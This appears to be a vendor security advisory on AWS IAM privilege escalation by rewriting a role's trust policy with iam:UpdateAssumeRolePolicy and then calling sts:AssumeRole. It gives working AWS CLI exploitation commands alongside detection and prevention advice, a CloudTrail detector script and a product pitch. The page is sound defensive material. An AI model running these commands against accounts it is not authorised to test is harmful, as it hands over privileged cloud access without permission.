AWS IAM privilege escalation • iam:UpdateAssumeRolePolicy + sts:AssumeRole
Severity: Critical

iam:UpdateAssumeRolePolicy Privilege Escalation

iam:UpdateAssumeRolePolicy rewrites a role’s trust policy — the document that decides who may assume it. An attacker can point a privileged role’s trust policy at their own principal, then assume the role and take on its permissions.

Permissions an attacker needs

  • iam:UpdateAssumeRolePolicy
  • sts:AssumeRole

How the escalation works

  • The attacker identifies a role with more permissions than they have.
  • They overwrite that role’s trust policy to allow their own user or role as a trusted principal.
  • They call sts:AssumeRole and operate with the privileged role’s permissions.

Example vulnerable policy

A policy like this grants the dangerous permission. Paste your own policy into the free AI-Powered IAM analyzer to see if you are exposed.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "iam:UpdateAssumeRolePolicy",
        "sts:AssumeRole"
      ],
      "Resource": "*"
    }
  ]
}

Example exploitation

For illustration only — run against accounts you own or are authorized to test.

aws iam update-assume-role-policy \
  --role-name privileged-role \
  --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"AWS":"arn:aws:iam::123456789012:user/attacker"},"Action":"sts:AssumeRole"}]}'
aws sts assume-role --role-arn arn:aws:iam::123456789012:role/privileged-role --role-session-name esc

How to detect and prevent it

  • Scope iam:UpdateAssumeRolePolicy to specific, non-privileged role ARNs only.
  • Apply a permissions boundary so an assumed role’s effective permissions cannot exceed it.
  • Alert on UpdateAssumeRolePolicy in CloudTrail; trust-policy changes on privileged roles are high-signal.
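As an added illustration of the CloudTrail alerting point above (example code, not Shieldly's or this page's own): a small Python detector that parses the new trust policy out of an UpdateAssumeRolePolicy record, raises a high-severity finding when a privileged role is opened to any principal outside an allowlist (which catches the same-account attacker user from the exploitation example), and a medium one for wildcard or cross-account trust on any other role. The account id, role names, allowlist and sample records are constructed, and the record shape (requestParameters.roleName and policyDocument as JSON text) is an assumption to check against your own trail.

```python
import json
from urllib.parse import unquote

ACCOUNT = "123456789012"                                   # monitored account (constructed)
PRIVILEGED_ROLES = {"privileged-role"}                     # roles whose trust policy must not drift
ALLOWED = {"arn:aws:iam::123456789012:role/deploy-role"}   # constructed allowlist for those roles
ASSUME_ACTIONS = {"sts:AssumeRole", "sts:*", "*"}

def as_list(x):
    return x if isinstance(x, list) else [x]               # IAM accepts a scalar or a list

def trust_principals(policy):
    """Principals granted sts:AssumeRole by an Allow statement of a trust policy."""
    found = set()
    for s in as_list(policy.get("Statement", [])):
        if s.get("Effect") != "Allow" or not ASSUME_ACTIONS & set(as_list(s.get("Action", []))):
            continue
        p = s.get("Principal", {})                         # "*" or {AWS|Service|Federated: ...}
        for v in (["*"] if p == "*" else p.values()):
            found.update(as_list(v))
    return found

def principal_account(p):
    """Account id of an AWS principal (ARN or bare 12-digit id); None for '*' or service principals."""
    acct = p.split(":")[4] if p.startswith("arn:aws:") and p.count(":") >= 5 else p
    return acct if acct.isdigit() and len(acct) == 12 else None

def evaluate(event):
    """Finding for an UpdateAssumeRolePolicy record that opens a role to an untrusted principal."""
    if (event.get("eventSource"), event.get("eventName")) != ("iam.amazonaws.com", "UpdateAssumeRolePolicy"):
        return None
    params = event["requestParameters"]
    principals = trust_principals(json.loads(unquote(params["policyDocument"])))
    privileged = params["roleName"] in PRIVILEGED_ROLES    # privileged role: anything off the allowlist
    bad = ({p for p in principals if p not in ALLOWED} if privileged   # other roles: wildcard or cross-account
           else {p for p in principals if p == "*" or principal_account(p) not in (None, ACCOUNT)})
    return {"severity": "high" if privileged else "medium", "role": params["roleName"],
            "actor": event["userIdentity"]["arn"], "principals": sorted(bad)} if bad else None

def make_event(role, principal):
    doc = {"Version": "2012-10-17",
           "Statement": [{"Effect": "Allow", "Principal": principal, "Action": "sts:AssumeRole"}]}
    return {"eventSource": "iam.amazonaws.com", "eventName": "UpdateAssumeRolePolicy",
            "userIdentity": {"arn": f"arn:aws:iam::{ACCOUNT}:user/dev-user"},
            "requestParameters": {"roleName": role, "policyDocument": json.dumps(doc)}}

# Constructed CloudTrail-style records; policyDocument is assumed to carry the new trust policy as JSON text.
SAMPLE_EVENTS = [make_event("privileged-role", {"AWS": f"arn:aws:iam::{ACCOUNT}:user/attacker"}),
                 make_event("app-role", {"Service": "ec2.amazonaws.com"}),
                 make_event("app-role", {"AWS": "arn:aws:iam::999999999999:root"})]
```

Run `[evaluate(e) for e in SAMPLE_EVENTS]` to see one high finding for the rewritten privileged-role trust, nothing for the EC2 service trust, and a medium finding for the cross-account trust.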

FAQ

How is this different from PassRole-based escalation?

PassRole hands an existing role to a service; UpdateAssumeRolePolicy changes who is allowed to assume a role directly. Both end with the attacker holding a more privileged role, but the trust-policy rewrite is detectable as a distinct CloudTrail event.

Check your IAM policies for this — free

Shieldly's AI-Powered analyzer flags privilege-escalation paths, wildcards, and risky PassRole in seconds. No signup, no AWS credentials. Also ships as CLI, VS Code extension, GitHub Action, and CDK Guard.

Amazon Web Services (AWS) is a trademark of Amazon.com, Inc. Shieldly is not affiliated with, endorsed by, or sponsored by Amazon Web Services.